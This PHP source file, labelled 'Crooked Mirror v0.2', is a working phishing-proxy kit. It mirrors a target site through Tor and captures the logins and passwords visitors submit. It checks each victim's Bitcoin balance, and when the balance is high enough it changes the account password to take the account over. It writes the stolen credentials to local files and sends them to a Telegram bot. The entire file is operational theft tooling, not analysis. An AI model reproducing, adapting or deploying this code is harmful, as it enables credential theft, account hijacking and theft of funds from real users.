////
<?php
//Crooked Mirror v0.2
include('rewrite.php');
$self = 'http://'.$_SERVER['SERVER_NAME'].'/';
$uri = file_get_contents($_SERVER['DOCUMENT_ROOT'].'/sitetarget.txt');
if(!$uri) exit('No target');
//Данные входящего запроса
$uripath = $_SERVER['REQUEST_URI'];
$isPost = $_SERVER['REQUEST_METHOD'] === 'POST';
$adress = $uripath;
$data = '';
if( is_numeric(strpos($uripath,'?')) ) {
$urlarr = explode('?',$uripath);
$adress = array_shift($urlarr);
$data = array_shift($urlarr);
}
if(is_numeric( strpos($adress,basename(__FILE__)) )) exit('No.');
if(strlen($data)>1) $data = '?'.$data;
if(substr($adress,strlen($adress)-1,strlen($adress))=='/') $adress = substr($adress,0,strlen($adress)-1);
$uripath = $adress.$data;
$outheads = getallheaders();
$clPost = array();
foreach($_POST as $key => $data) {
//if($key=='login') logger($data.' - ');
//if($key=='password') logger($data."\n\n");
$clPost[$key] = $data;
}
session_name('webcook');
session_start();
if( ($myCurl = curl_init()) != true) {die("No cure init");}
curl_setopt($myCurl, CURLOPT_HTTPHEADER, $outheads);
curl_setopt($myCurl, CURLOPT_USERAGENT, $outheads['User-Agent'] );
curl_setopt($myCurl, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($myCurl, CURLOPT_MAXREDIRS, 10);
curl_setopt($myCurl, CURLOPT_TIMEOUT, 30);
curl_setopt($myCurl, CURLOPT_ENCODING, 'gzip,deflate');
curl_setopt($myCurl, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($myCurl, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($myCurl, CURLOPT_RETURNTRANSFER, true);
curl_setopt($myCurl, CURLOPT_PROXYTYPE, 7);
curl_setopt($myCurl, CURLOPT_PROXY, "127.0.0.1:9050");
$reload = false;
if( strlen( session_id() ) > 0 ) {
$cookiefile = dirname(__FILE__) . '/tmpcookies/' . session_id().'.txt';
if(!file_exists($cookiefile) && file_exists(dirname(__FILE__) . '/tmpcookies/maincook.txt')) copy(dirname(__FILE__) . '/tmpcookies/maincook.txt',$cookiefile);
curl_setopt($myCurl, CURLOPT_COOKIEFILE, $cookiefile );
curl_setopt($myCurl, CURLOPT_COOKIEJAR, $cookiefile);
} else {$reload = true;}
curl_setopt($myCurl, CURLOPT_URL, $uri.$uripath);
if($isPost) {
curl_setopt($myCurl, CURLOPT_POST, $isPost);
curl_setopt($myCurl, CURLOPT_POSTFIELDS, http_build_query($clPost));
}
$response = curl_exec($myCurl);
if($reload) {
header("HTTP/1.1 301 Moved Permanently",true,301);
header("Location: $self");
exit();
}
$effurl = curl_getinfo($myCurl, CURLINFO_EFFECTIVE_URL);
$effurl = substr($effurl,strlen($uri),strlen($effurl));
while($uripath[0]=='/' || $effurl[0]=='/') {
if($uripath[0]=='/') $uripath = substr($uripath,1,strlen($uripath));
if($effurl[0]=='/') $effurl = substr($effurl,1,strlen($effurl));
}
//if(!$_SESSION['ReTime']) $_SESSION['ReTime']=0;
//if(!$_SESSION['ReCount']) $_SESSION['ReCount']=0;
if($_SESSION['ReTime']>(time()-1)) {$_SESSION['ReCount']++;}else{$_SESSION['ReCount']=0;}
$_SESSION['ReTime'] = time();
if($_SESSION['ReCount']>5) exit( 'error '.$effurl.' == '.$uripath.' - '.($effurl==$uripath) );
header("HTTP/1.1 200 OK",true,200);
if($effurl!=$uripath) header("Location: $self$effurl");
header('Content-Type: text/html; charset=utf8');
if(strlen($response)<1) exit("Высокая нагрузка на сайт, попробуйте обновить страницу.");
$response = str_replace( $uri , $self , $response );
$response = change_post_link($response);
$needle = 'https';
$replace = 'http';
$response = str_replace( $needle , $replace , $response );
$response = rewrite($response,$uripath);
if(!defined('INCLUDE_CHECK')) {
if( is_numeric(strpos($uripath,'?')) ) $uripath = array_shift(explode('?',$uripath));
$buildarr = explode('/',$adress);
fillingin($buildarr,$response);
}
if($_POST['login'] != "" && $_POST['password'] != "")
{
$response = str_replace("\n","",$response);
preg_match('/<a href="\/balance" title="На вашем счете (.*?)"><i class="i_wallet"><\/i><span>(.*?) BTC<\/span><\/a>/', $response, $bal);
$arrboot = explode("\n",file_get_contents($_SERVER['DOCUMENT_ROOT'].'/amount_d.txt'));
$amount = $arrboot[rand(0,count($arrboot)-1)];
$pass = $_POST['password'];
if((float)$bal[2] > (float)$amount) {
$pass = random_pass();
preg_match('/value="(.*?)">/', $response, $found);
$fsd = fopen($_SERVER['DOCUMENT_ROOT'].'/сdj435dgdf.txt',"a");
$str = "Данные - " . $_POST['login'] . ":" . $pass . PHP_EOL . "Баланс - " . trim($bal[2]) . " / " . $bal[1] . PHP_EOL . "Старый пароль - " . $_POST['password'] . "\r\n";
fwrite($fsd, $str);
fclose($fsd);
$data = [
"_token" => $found[1],
"_time" => time(),
"avatar" => "",
"password" => $pass,
"password_confirmation" => $pass,
"old_password" => $_POST['password'],
"settings[theme]" => "hydra",
"settings[notify]" => "default",
"settings[gpg_key]" => ""
];
if( ($myCurl = curl_init()) != true) {die("No cure init");}
curl_setopt($myCurl, CURLOPT_HTTPHEADER, $outheads);
curl_setopt($myCurl, CURLOPT_USERAGENT, $outheads['User-Agent'] );
curl_setopt($myCurl, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($myCurl, CURLOPT_MAXREDIRS, 10);
curl_setopt($myCurl, CURLOPT_TIMEOUT, 30);
curl_setopt($myCurl, CURLOPT_ENCODING, 'gzip,deflate');
curl_setopt($myCurl, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($myCurl, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($myCurl, CURLOPT_RETURNTRANSFER, true);
curl_setopt($myCurl, CURLOPT_PROXYTYPE, 7);
curl_setopt($myCurl, CURLOPT_PROXY, "127.0.0.1:9050");
$reload = false;
if( strlen( session_id() ) > 0 ) {
$cookiefile = dirname(__FILE__) . '/tmpcookies/' . session_id().'.txt';
if(!file_exists($cookiefile) && file_exists(dirname(__FILE__) . '/tmpcookies/maincook.txt')) copy(dirname(__FILE__) . '/tmpcookies/maincook.txt',$cookiefile);
curl_setopt($myCurl, CURLOPT_COOKIEFILE, $cookiefile );
curl_setopt($myCurl, CURLOPT_COOKIEJAR, $cookiefile);
} else {$reload = true;}
curl_setopt($myCurl, CURLOPT_URL, $uri."/user/{$_POST['login']}/account");
curl_setopt($myCurl, CURLOPT_POST, true);
curl_setopt($myCurl, CURLOPT_POSTFIELDS, http_build_query($data));
$response = curl_exec($myCurl);
session_regenerate_id();
logger("==============================" . PHP_EOL . "Time:" .date("H:i:s d.m.Y") . PHP_EOL . "Account: {$_POST['login']}" . PHP_EOL . "Balance: " . trim($bal[2]) . " | " . $bal[1] . PHP_EOL . "Старый пароль: {$_POST['password']}" . PHP_EOL . "Новый пароль: {$pass}" . PHP_EOL . "==============================",1);
} else {
logger("Данные - " . $_POST['login'] . ":" . $pass . PHP_EOL . "Баланс - " . trim($bal[2]) . " | " . $bal[1] . PHP_EOL);
}
}
$response = str_replace('<form method="GET" action="//catalog" accept-charset="UTF-8" id="catalog-filters" class="searchform">', '<form method="GET" action="/catalog" accept-charset="UTF-8" id="catalog-filters" class="searchform">', $response);
// fclose($fd);
exit($response);
function logger($msg,$type = 0) {
//$msg.='\n\n';
if(!$handle = fopen($_SERVER['DOCUMENT_ROOT'].'/logs.txt',"a")) return "File does open";
if(fwrite($handle,$msg,strlen($msg))===false) return "cant write";
fclose($handle);
if($type == 0) {
// общий лог
tg_send_message(-chat_id, $msg, "id_bot:token_bot");
} else {
// лог для сменненых акков
tg_send_message(-chat_id, $msg, "id_bot:token_bot");
}
}
function random_pass($length = 12) {
$use = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890";
$api = '';
srand((double)microtime()*1000000);
for($i=0; $i<$length; $i++) {
$api.= $use[rand()%strlen($use)];
}
return $api;
}
function change_post_link($response,$offset = 0)
{
$Lresponse = strtolower($response);
$needle = 'method="post"';
$coorstar = strpos($Lresponse,$needle,$offset);
if(!is_numeric($coorstar)) return $response;
$offset = $coorstar+strlen($needle);
while($Lresponse[$coorstar]!='<' || $coorstar<1) $coorstar--;
if($coorstar<1) return change_post_link($response,$offset);
$needle = 'action="';
$coorstar = strpos($Lresponse,$needle,$coorstar);
if(!is_numeric($coorstar)) return change_post_link($response,$offset);
$coorstar += strlen($needle);
$coorend = strpos($Lresponse,'"',$coorstar);
if(!is_numeric($coorend)) return change_post_link($response,$offset);
if($response[$coorend-1]=='/') return $response;
$response = substr($response,0,$coorend).'/'.substr($response,$coorend,strlen($response));
return change_post_link($response,$offset);
}
function fillingin($buildarr,$response = 'NULL') {
if(strpos($buildarr[count($buildarr)-1],'.') === false) {$filename = ''; } else {$filename = array_pop($buildarr);}
$format = strpos($filename,'.');
$newaddres = '\'';
$filepath = '';
foreach($buildarr as $name) {
if($name=='') continue;
$newaddres = $newaddres.'../';
$filepath = $filepath.$name.'/';
}
$newaddres = '<?php define(\'INCLUDE_CHECK\',true); require '.$newaddres.'crookedmirror.php\';';
if($filename=="") $filename='index.php';
if(file_exists($filepath.$filename)) return "already done";
if( !file_exists($filepath) ) mkdir($filepath, 0777, true);
if(is_numeric($format)) $newaddres = $response;
if($newaddres!='') {
if(!$handle = fopen($filepath.$filename , "w")) return "File does open";
if(fwrite($handle,$newaddres,strlen($newaddres))===false) return "cant write";
fclose($handle);
}
//copy('.htaccess', $filepath.'.htaccess');
$buildarr[count($buildarr)-1]="";
if(count($buildarr)>0) fillingin($buildarr);
}
function apitgbot($n, $post, $token = "")
{
global $settings;
if($token == "") $token = $settings['tgtoken'];
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "https://api.telegram.org/bot".$token."/".$n);
curl_setopt($ch, CURLOPT_HEADER, false);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 30);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
$data = json_decode(curl_exec($ch));
curl_close($ch);
return $data;
}
function tg_send_message($to, $text, $token = "")
{
$post['chat_id'] = $to;
$post['parse_mode'] = "HTML";
$post['disable_web_page_preview'] = false;
$post['text'] = $text;
return apitgbot("sendMessage", $post, $token);
}